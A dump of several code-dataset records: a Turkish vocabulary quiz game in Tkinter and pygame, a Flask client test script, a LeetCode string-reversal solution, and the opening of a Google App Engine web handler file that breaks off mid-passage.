çanta.\",\r\n \"bayat\":\"Taze olmayan.\",\r\n \"bellek\":\"Hafıza.\",\r\n \"beyaz\":\"Ak.\",\r\n \"buket\":\"Çiçek demeti.\",\r\n \"buz\":\"Suyun ısı vererek katılaşmış hali.\",\r\n \"büyüteç\":\"Cisimleri büyüten, yaklaştırıcı mercek.\",\r\n \"cahil\":\"Bilgisiz.\",\r\n \"canlı\":\"Diri.\",\r\n \"cesaret\":\"Zor işleri başarmak için kişinin kendinde duyduğu güven hali.\",\r\n \"cevap\":\"Yanıt.\",\r\n \"cılız\":\"Kuvvetsiz, çok zayıf.\",\r\n \"cihan\":\"Dünya.\",\r\n \"cilt\":\"Ten, deri.\",\r\n \"cüce\":\"Boyu normal boydan küçük olan.\",\r\n \"çaba\":\"Bir iş yapmak için harcanan emek, güç.\",\r\n \"çalışmak\":\"Bir şey ortaya koymak için emek harcamak.\",\r\n \"çarpmak\":\"Hızla vurmak.\",\r\n \"çarşı\":\"Alışveriş yerlerinin bulunduğu yer.\",\r\n \"çehre\":\"Yüz, surat.\",\r\n \"çekingen\":\"Ürkek, girişken olmayan.\",\r\n \"çerez\":\"Yemek dışında yenen yemiş gibi yiyecekler.\",\r\n \"çığ\":\"Dağın bir yerinden kopup yuvarlanarak büyüyen kar yığını.\",\r\n \"çığlık\":\"İnce ve keskin bir biçimde haykırış.\",\r\n \"çiftçi\":\"Toprağı ekerek geçim sağlayan kimse.\",\r\n \"çiğ\":\"Pişmemiş.\",\r\n \"çok\":\"Gereken miktardan fazla.\",\r\n \"dadı\":\"Çocuk bakan kadın.\",\r\n \"dağ\":\"Çevresine göre yüksek olan toprak ya da kaya kütlesi.\",\r\n \"dargın\":\"Gücenmiş, küsmüş.\",\r\n \"dayı\":\"Annenin erkek kardeşi.\",\r\n \"derece\":\"Isı ölçen alet.\",\r\n \"dilek\":\"İstek.\",\r\n \"dürüst\":\"Her şartta doğruluktan ayrılmayan.\",\r\n \"düş\":\"Rüya.\",\r\n \"düzine\":\"Aynı cinsten on iki parçanın oluşturduğu takım.\",\r\n \"ece\":\"Kraliçe.\",\r\n \"eğik\":\"Dik olmayan.\",\r\n \"eğri\":\"Düz olmayan.\",\r\n \"eldiven\":\"Eli, dış etkenlerden korumak için ele giyilen giysi.\",\r\n \"engel\":\"Mani.\",\r\n \"esir\":\"Tutsak.\",\r\n \"etraf\":\"Çevre, yakın yer.\",\r\n \"fakir\":\"Yoksul.\",\r\n \"feryat\":\"Haykırma, çığlık atma.\",\r\n \"felâket\":\"Büyük zararlara yol açan durum.\",\r\n \"fırtına\":\"Şiddetli rüzgar.\",\r\n \"fidan\":\"Taze, yeni gelişmeye başlamış ağaç.\",\r\n \"fiyat\":\"Bir şeyin para olarak değeri.\",\r\n \"gar\":\"Büyük tren istasyonu.\",\r\n \"gazi\":\"Düşmanla savaşıp sağ olarak kurtulan kimse.\",\r\n \"gecikmek\":\"Geç kalmak.\",\r\n \"gezi\":\"Gezmek, görmek, tanımak için yapılan yolculuk.\",\r\n \"gıda\":\"Besin.\",\r\n \"göl\":\"Dört yanı karalarla çevrili geniş su birikintisi.\",\r\n \"göz\":\"Görme organı.\",\r\n \"gürbüz\":\"Gelişmiş, iri sağlam yapılı.\",\r\n \"güz\":\"Sonbahar.\",\r\n \"hademe\":\"Hizmetli.\",\r\n \"hafıza\":\"Bellek.\",\r\n \"hafif\":\"Tartıldığında ağırlığı az olan.\",\r\n \"hâkim\":\"Yargıç.\",\r\n \"halat\":\"Kalın ip.\",\r\n \"hamal\":\"Yük taşıyarak geçimini sürdüren kimse.\",\r\n \"harp\":\"Savaş.\",\r\n \"hata\":\"Yanlışlık.\",\r\n \"hatıra\":\"Anı.\",\r\n \"hayat\":\"Yaşam.\",\r\n \"hediye\":\"Armağan.\",\r\n \"hekim\":\"Doktor.\",\r\n \"hırçın\":\"Sinirli, huysuz kimse.\",\r\n \"hız\":\"Sürat.\",\r\n \"ırak\":\"Uzak.\",\r\n \"ırmak\":\"Nehir.\",\r\n \"iade\":\"Geri verme.\",\r\n \"icat\":\"Yeni bir şey bulma.\",\r\n \"içten\":\"Samimi, yürekten, candan.\",\r\n \"ihtiyar\":\"Yaşlı.\",\r\n \"ikaz\":\"Uyarma, uyandırma.\",\r\n \"ilâve\":\"Ek.\",\r\n \"ilk\":\"En önce.\",\r\n \"imtihan\":\"Sınav.\",\r\n \"istiklâl\":\"Bağımsızlık.\",\r\n \"iz\":\"Bir şeyin geçtiği yerde bıraktığı işaret.\",\r\n \"izlemek\":\"Arkasından gitmek, takip etmek.\",\r\n \"kabahat\":\"Suç, kusur.\",\r\n \"kaçmak\":\"Tehlikeli bir durumdan hızlıca uzaklaşmak.\",\r\n \"kalp\":\"Yürek.\",\r\n \"kapmak\":\"Ansızın yakalayıp almak.\",\r\n \"kara\":\"Siyah.\",\r\n \"kasa\":\"Para, değerli eşyalar saklamaya yarayan çelik dolap.\",\r\n \"kâşif\":\"Keşfeden, bulan.\",\r\n \"kaşkol\":\"Boyun atkısı.\",\r\n \"katı\":\"Yumuşak olmayan, sert.\",\r\n \"kaybetmek\":\"Yitirmek.\",\r\n \"kaygı\":\"Üzüntü, tasa.\",\r\n \"kelime\":\"Sözcük.\",\r\n \"kent\":\"Şehir.\",\r\n \"kırık\":\"Kırılmış olan.\",\r\n \"kısa\":\"Boyu az olan.\",\r\n \"kızgın\":\"Öfkeli, sinirli.\",\r\n \"koç\":\"Erkek koyun.\",\r\n \"kolye\":\"Boyna takılan süs eşyası. Gerdanlık.\",\r\n \"koşmak\":\"İleriye doğru hızla gitmek.\",\r\n \"kundura\":\"Ayakkabı.\",\r\n \"lüzum\":\"Gerek, gereklilik, lazım olma.\",\r\n \"mağara\":\"İn.\",\r\n \"mana\":\"Anlam.\",\r\n \"mazaret\":\"Özür.\",\r\n \"mektep\":\"Okul.\",\r\n \"memleket\":\"Ülke.\",\r\n \"merasim\":\"Tören.\",\r\n \"mert\":\"Yiğit. Sözüne güvenilir.\",\r\n \"mesafe\":\"Ara, uzaklık.\",\r\n \"millet\":\"Ulus.\",\r\n \"mutlaka\":\"Kesinlikle.\",\r\n \"müddet\":\"Süre.\",\r\n \"mükemmel\":\"Kusursuz, eksiksiz.\",\r\n \"münakaşa\":\"Tartışma.\",\r\n \"müsabaka\":\"Yarışma.\",\r\n \"müsait\":\"Uygun.\",\r\n \"nehir\":\"Irmak.\",\r\n \"netice\":\"Sonuç.\",\r\n \"noksan\":\"Eksik.\",\r\n \"numune\":\"Örnek.\",\r\n \"oğlak\":\"Keçi yavrusu.\",\r\n \"okul\":\"Mektep.\",\r\n \"olanak\":\"İmkan.\",\r\n \"orman\":\"Ağaçlarla kaplı geniş alan.\",\r\n \"ozan\":\"Halk şairi.\",\r\n \"ödül\":\"Bir başarıya verilen mükafat.\",\r\n \"öğüt\":\"Nasihat.\",\r\n \"öneri\":\"Bir konuda, kabul edilmesi için öne sürülen düşünce.\",\r\n \"öykü\":\"Hikaye.\",\r\n \"özen\":\"İtina.\",\r\n \"pabuç\":\"Ayakkabı.\",\r\n \"seyahat\":\"Yolculuk, gezi.\",\r\n \"sıhhat\":\"Sağlık.\",\r\n \"sözcük\":\"Kelime.\",\r\n \"surat\":\"Yüz.\",\r\n \"şahit\":\"Tanık.\",\r\n \"şen\":\"Sevinçli, canlı, mutlu kimse.\",\r\n \"tabip\":\"Hekim. Doktor.\",\r\n \"tamir\":\"Onarma.\",\r\n \"tebessüm\":\"Gülümseme.\",\r\n \"ucuz\":\"Pahalı olmayan.\",\r\n \"uslu\":\"Yaramaz olmayan.\",\r\n \"vadi\":\"İki dağ arasında bulunan uzun geçit.\",\r\n \"valide\":\"Anne. Ana.\",\r\n \"vasıta\":\"Araç.\",\r\n \"vazife\":\"Görev.\",\r\n \"vaziyet\":\"Durum, konum, tavır.\",\r\n \"volkan\":\"Yanardağ.\",\r\n \"yanardağ\":\"Volkan.\",\r\n \"yarar\":\"Fayda.\",\r\n \"yargıç\":\"Hakim.\",\r\n \"yem\":\"Hayvan yiyeceği.\",\r\n \"yiğit\":\"Yürekli, güçlü.\",\r\n \"yitirmek\":\"Kaybetmek.\",\r\n \"yoksul\":\"Fakir\",\r\n \"yüz\":\"Surat.\",\r\n \"zannetmek\":\"Sanmak.\",\r\n \"zelzele\":\"Deprem.\"}\r\n \r\nkelime=[\"abaküs\",\"abartmak\",\"abide\",\"abla\",\"abone\",\"abur cubur\",\"acaba\",\"acele\",\"acemi\",\"acı\",\"acıkmak\",\"acılı\",\"acil\",\"âciz\",\"aç\",\"açık\",\"açıklamak\",\"ad\",\"ada\",\r\n \"adale\",\"adam\",\"adet\",\"adil\",\"afacan\",\"affetmek\",\"ağ\",\"ağabey\",\"ağaç\",\"ağıl\",\"ağır\",\"ağlamak\",\"ağrı\",\"ahenk\",\"ahır\",\"aidat\",\"ak\",\"akçe\",\"akıbet\",\"akıl\",\r\n \"akraba\",\"akran\",\"akrobat\",\"aksi\",\"akşam\",\"aktör\",\"aktris\",\"al\",\"alâmet\",\"alan\",\"alçak\",\"aldatmak\",\"âlim\",\"almak\",\"alo\",\"alp\",\"alt\",\"amaç\",\"ambar\",\"amca\",\r\n \"ana\",\"anı\",\"anıt\",\"aramak\",\"arzu\",\"asır\",\"aş\",\"atik\",\"atlamak\",\"avize\",\"ay\",\"ayaz\",\"aygıt\",\"ayrıntı\",\"az\",\"aza\",\"azami\",\"baba\",\"bağ\",\"bahtiyar\",\"bavul\",\r\n \"bayat\",\"bellek\",\"beyaz\",\"buket\",\"buz\",\"büyüteç\",\"cahil\",\"canlı\",\"cesaret\",\"cevap\",\"cılız\",\"cihan\",\"cilt\",\"cüce\",\"çaba\",\"çalışmak\",\"çarpmak\",\"çarşı\",\r\n \"çehre\",\"çekingen\",\"çerez\",\"çığ\",\"çığlık\",\"çiftçi\",\"çiğ\",\"çok\",\"dadı\",\"dağ\",\"dargın\",\"dayı\",\"derece\",\"dilek\",\"dürüst\",\"düş\",\"düzine\",\"ece\",\"eğik\",\"eğri\",\r\n \"eldiven\",\"engel\",\"esir\",\"etraf\",\"fakir\",\"feryat\",\"felâket\",\"fırtına\",\"fidan\",\"fiyat\",\"gar\",\"gazi\",\"gecikmek\",\"gezi\",\"gıda\",\"göl\",\"göz\",\"gürbüz\",\"güz\",\r\n \"hademe\",\"hafıza\",\"hafif\",\"hâkim\",\"halat\",\"hamal\",\"harp\",\"hata\",\"hatıra\",\"hayat\",\"hediye\",\"hekim\",\"hırçın\",\"hız\",\"ırak\",\"ırmak\",\"iade\",\"icat\",\"içten\",\r\n \"ihtiyar\",\"ikaz\",\"ilâve\",\"ilk\",\"imtihan\",\"istiklâl\",\"iz\",\"izlemek\",\"kabahat\",\"kaçmak\",\"kalp\",\"kapmak\",\"kara\",\"kasa\",\"kâşif\",\"kaşkol\",\"katı\",\"kaybetmek\",\r\n \"kaygı\",\"kelime\",\"kent\",\"kırık\",\"kısa\",\"kızgın\",\"koç\",\"kolye\",\"koşmak\",\"kundura\",\"lüzum\",\"mağara\",\"mana\",\"mazaret\",\"mektep\",\"memleket\",\"merasim\",\"mert\",\r\n \"mesafe\",\"millet\",\"mutlaka\",\"müddet\",\"mükemmel\",\"münakaşa\",\"müsabaka\",\"müsait\",\"nehir\",\"netice\",\"noksan\",\"numune\",\"oğlak\",\"okul\",\"olanak\",\"orman\",\"ozan\",\r\n \"ödül\",\"öğüt\",\"öneri\",\"öykü\",\"özen\",\"pabuç\",\"seyahat\",\"sıhhat\",\"sözcük\",\"surat\",\"şahit\",\"şen\",\"tabip\",\"tamir\",\"tebessüm\",\"ucuz\",\"uslu\",\"vadi\",\"valide\",\r\n \"vasıta\",\"vazife\",\"vaziyet\",\"volkan\",\"yanardağ\",\"yarar\",\"yargıç\",\"yem\",\"yiğit\",\"yitirmek\",\"yoksul\",\"yüz\",\"zannetmek\",\"zelzele\"]\r\n\r\ndo=0\r\nya=0\r\n\r\ndef başla1():\r\n label=Label(text=\" \",fg=\"white\",bg=\"blue\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n\r\n label=Label(text=\" \",fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n pygame.mixer.music.load(\"hello.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n for s in random.sample(range(0,2),1):\r\n if s == 0:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(k)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n def yanlış():\r\n global do,ya\r\n if sözlük[d]!= sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n\r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n\r\n else:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(d)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[d]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1() \r\n\r\n def yanlış():\r\n global do,ya\r\n \r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n\r\ndef başla():\r\n global do,ya\r\n\r\n do=0\r\n ya=0\r\n label=Label(text=\" \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n label=Label(text=\" \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n\r\n label=Label(text=\"0\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n label=Label(text=\"0\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n label=Label(text=\" \",fg=\"white\",bg=\"blue\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n\r\n label=Label(text=\" \",fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n pygame.mixer.music.load(\"hello.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n for s in random.sample(range(0,2),1):\r\n if s == 0:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(k)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n def yanlış():\r\n global do,ya\r\n if sözlük[d]!= sözlük[k]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n\r\n else:\r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n b1=59\r\n a1=9\r\n while True:\r\n label1.config(text=\"Kalan saniye %d:%d \"%(b1,a1),font=\"Helvetica 15 bold\")\r\n a1-=1\r\n time.sleep(0.105)\r\n buton1.update() \r\n if a1<0:\r\n b1-=1\r\n a1=9\r\n if b1<0:\r\n pygame.mixer.music.load(\"Gong.mp3\")\r\n pygame.mixer.music.play()\r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n break\r\n else:\r\n for d in random.sample((kelime),1): \r\n for k in random.sample((kelime),1):\r\n label=Label(text=\"Altta anlamı verilen '\"+str(d)+\"' kelimesinin anlamı doğru ise DOĞRU kutucuğuna, yanlış ise YANLIŞ kutucuğuna basınız.\",fg=\"white\",bg=\"blue\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.05, rely = 0.1)\r\n \r\n label=Label(text=sözlük[d],fg=\"yellow\",bg=\"red\",font=\"Helvetica 20 bold\")\r\n label.place(relx = 0.05, rely = 0.20)\r\n\r\n def doğru(): \r\n global do,ya\r\n if sözlük[d] == sözlük[d]:\r\n do+=1\r\n label=Label(text=do,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.72, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"alkis.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1() \r\n\r\n def yanlış():\r\n global do,ya\r\n \r\n ya+=1\r\n label=Label(text=ya,fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\n label.place(relx = 0.82, rely = 0.9)\r\n \r\n pygame.mixer.music.load(\"hata.mp3\")\r\n pygame.mixer.music.play()\r\n\r\n time.sleep(2)\r\n\r\n başla1()\r\n \r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",command=doğru,width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",command=yanlış,width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n b1=59\r\n a1=9\r\n while True:\r\n label1.config(text=\"Kalan saniye %d:%d \"%(b1,a1),font=\"Helvetica 15 bold\")\r\n a1-=1\r\n time.sleep(0.105)\r\n buton1.update() \r\n if a1<0:\r\n b1-=1\r\n a1=9\r\n if b1<0:\r\n pygame.mixer.music.load(\"Gong.mp3\")\r\n pygame.mixer.music.play()\r\n birer = Button()\r\n birer.config(text=\"DOĞRU\",width='8',fg=\"white\",bg=\"green\",font=\"Helvetica 30 bold\")\r\n birer.place(relx = 0.3, rely = 0.5)\r\n\r\n birer1 = Button()\r\n birer1.config(text=\"YANLIŞ\",width='8',fg=\"white\",bg=\"red\",font=\"Helvetica 30 bold\")\r\n birer1.place(relx = 0.5, rely = 0.5)\r\n \r\n break\r\n \r\nlabel=Label(text=\"KELİME ANLAMINI BULMA OYUNU\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 20 bold\")\r\nlabel.place(relx = 0.3, rely = 0.0) \r\n \r\nlabel=Label(text=\"0 \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.82, rely = 0.9)\r\n\r\nlabel=Label(text=\"YANLIŞ\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.8, rely = 0.85)\r\n\r\nlabel=Label(text=\"0 \",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.72, rely = 0.9)\r\n\r\nlabel=Label(text=\"DOĞRU\",fg=\"red\",bg=\"yellow\",font=\"Helvetica 15 bold\")\r\nlabel.place(relx = 0.7, rely = 0.85)\r\n\r\nbuton=Button()\r\nbuton.config(text=\"ÇIKIŞ\",command=pencere.destroy,width='10',bg=\"yellow\",fg=\"red\",font=('Helvetica',15,\"bold\"))\r\nbuton.place(relx = 0.9, rely = 0.9)\r\n\r\nlabel=Label(text=\"gokselgursu@gmail.com --- http://www.egitimhane.com/\",fg=\"yellow\",bg=\"blue\")\r\nlabel.place(relx = 0.66, rely = 0.95)\r\n\r\nlabel1=Label(text=\"Kalan saniye 60.0\",fg=\"red\",font=\"Helvetica 15 bold\")\r\nlabel1.place(relx = 0.42, rely = 0.92)\r\n\r\nbuton1=Button()\r\nbuton1.config(text=\"BAŞLAT\", command=başla,width='20',bg=\"red\",fg=\"yellow\",font=('Helvetica',15,\"bold\"))\r\nbuton1.place(relx = 0.4, rely = 0.85)\r\n\r\npencere.mainloop()\r\n","sub_path":"kelime_anlamini_bulma_oyunu_win.py","file_name":"kelime_anlamini_bulma_oyunu_win.py","file_ext":"py","file_size_in_byte":29655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"556254567","text":"import requests\nimport json\n\n\ndef add():\n url = 'http://127.0.0.1:5000/add'\n data = {\n \"value_array\": [\n {\"value\": 12},\n {\"value\": 18},\n {\"value\": 10}\n ]\n }\n headers = {\n 'Content-Type': 'application/json',\n }\n response = requests.post(url, data=json.dumps(data), headers=headers)\n print(response.json())\n\n\ndef get_date():\n url = 'http://127.0.0.1:5000/get_date'\n response = requests.get(url)\n print(response.json())\n\n\ndef chat(msg):\n url = 'http://127.0.0.1:5000/chat'\n data = {\n \"msg\": msg\n }\n response = requests.post(url, data=data)\n print(response.json())\n\n\nif __name__ == '__main__':\n add()\n get_date()\n chat('您好吗,再见了')","sub_path":"flask_restful/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"567158160","text":"\"\"\"\nGiven a string, you need to reverse the order of characters in each word within a\nsentence while still preserving whitespace and initial word order.\n\"\"\"\n\nclass Solution(object):\n def reverseWords(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n word = \"\"\n sentence = \"\"\n for c in s:\n if c != \" \":\n word = c + word\n else:\n sentence += word + \" \"\n word = \"\"\n\n sentence += word\n return sentence\n\n # This is very fast\n def reverseWords2(self, s):\n return \" \".join(i[::-1] for i in s.split())\n\ns = \"Let's take LeetCode contest\"\nprint(Solution().reverseWords(s))","sub_path":"557RevWord3.py","file_name":"557RevWord3.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"371795210","text":"import cgi\nimport os\nimport StringIO\nimport urllib\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext import db\nfrom collections import defaultdict\n\nfrom IO import *\nimport models\nfrom related import *\nfrom search import *\n\n\n\nclass Code(db.Model):\n \"\"\"\n Code wrapper\n Blob is a TextProperty\n \"\"\"\n blob = db.TextProperty()\n\n\n\nclass MainPage(webapp.RequestHandler):\n\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Displays home page\n \"\"\"\n\n template_values = {}\n path = os.path.join(os.path.dirname(__file__), 'html/index.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \n \nclass IO(webapp.RequestHandler):\n \"\"\"\n webapp.RequestHandler is a module used currently only so we can enable an import/export on the main page\n This class is the main page of our site\n \"\"\"\n\n status = \"\"\n def get(self): \n \"\"\"\n Called to handle an HTTP GET request.\n Displays home page\n \"\"\"\n template_values = { 's': IO.status }\n path = os.path.join(os.path.dirname(__file__), 'html/io.html')\n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n\n def post(self):\n \"\"\"\n Called to handle an HTTP POST request.\n Calls fill_db with the input file as a parameter in order to import data.\n \"\"\"\n f = cgi.escape(self.request.get('filename'))\n obj = Code()\n \n #try:\n obj.blob=db.Text(f, encoding = \"utf_8\")\n fill_db(obj.blob)\n IO.status = \"Success!\" \n self.redirect('/io')\n #except:\n # IO.status = \"Invalid File.\" \n # self.redirect('/io')\n\n\n\nclass Crises_Index(webapp.RequestHandler):\n \"\"\"\n Crisis_Index is a RequestHandler class.\n This class handles the page that lists all of the crises currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the crises in our database by performing a Query. \n Sends the result to \"crisis_index\", whose result is then used to render the page displayed using \"general.html\" \n \"\"\"\n \n crises = db.GqlQuery(\"SELECT * FROM Crisis ORDER BY category\")\n d = defaultdict(list)\n \n for crisis in crises:\n d[crisis.category].append(crisis)\n sorted_crises = sort_dict(d)\n \n template_values = {'sorted_list':sorted_crises, 'type': 'crises'}\n path = os.path.join(os.path.dirname(__file__), 'html/intermediate.html') \n general_values = { 'content' : template.render(path, template_values) }\n general_path = os.path.join(os.path.dirname(__file__), 'html/general.html')\n self.response.out.write(template.render(general_path, general_values))\n \nclass Orgs_Index(webapp.RequestHandler):\n \"\"\"\n Orgs_Index is a RequestHandler class.\n This class handles the page that lists all of the organizations currently in our database.\n \"\"\"\n def get(self):\n \"\"\"\n Called to handle an HTTP GET request.\n Gets all of the organizations in our database by performing a Query. \n Sends the result 